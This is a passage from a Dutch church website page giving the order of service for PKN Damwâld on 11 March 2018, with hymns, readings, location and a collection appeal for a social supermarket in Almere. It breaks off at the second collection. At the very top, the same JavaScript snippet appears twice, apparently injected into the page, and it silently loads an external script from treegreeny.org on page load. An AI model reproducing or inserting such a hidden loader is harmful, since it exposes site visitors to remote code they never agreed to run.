;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 11 maart 2018 9:30 uur - PKN Damwâld
zondag 11 maart 2018
09:30 uur

Kerkdienst zondag 11 maart 2018 9:30 uur

Informatie

Voorganger:Ds. J. Glas, Kootstertille
Organist:Ivo van Hijum
Liturgie
Lied voor de dienst : Gezang 172 vs. 1 & 4
Welkom en mededelingen
Intochtslied : Psalm 122 vs. 1 & 2
Stil Gebed, Bemoediging en Groet
Gebed om vergeving en genade
Lied van Lofprijzing: ELB 343 vs. 1, 3 & 4
Gebed van de Zondag
We lezen: Johannes 6 vs. 4 – 15
We zingen: Gezang 463
We lezen: Efeze 2 vs. 4 – 10
We zingen: Gezang 75 vs. 1, 8 & 9
Preek .
We zingen: Gezang 99 vs. 1 & 5
Gebeden
Collecte
Slotlied : Gezang 160 vs. 1 & 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Kerken in Almere

40-Dagentijd: Binnenlands Diaconaat:
Kerken Almere runnen een sociale supermarkt
Almere is een jonge stad waar sociale samenhang ontbreekt en veel armoede en werkloosheid voorkomt. Samen met andere kerken staat de Protestantse Kerk in Almere mensen in (financiële) nood bij met praktische hulp, waaronder een sociale supermarkt. Hier krijgen klanten niet een standaard voedselpakket maar een persoonlijke pas om boodschappen te doen die aansluiten bij hun behoefte en gezinsgrootte. Ook is er een kleding, meubel- en witgoedloket. Jaarlijks helpt de kerk hiermee tussen de 1.300 en 1.500 mensen. Al de verschillende activiteiten vinden plaats op zeven locaties verspreid over de stad. De kerken willen alles onderbrengen in één pand. Collecteert u mee voor dit sociale project en voor de inrichting van het nieuwe pand?

Tweede collecte: Kerk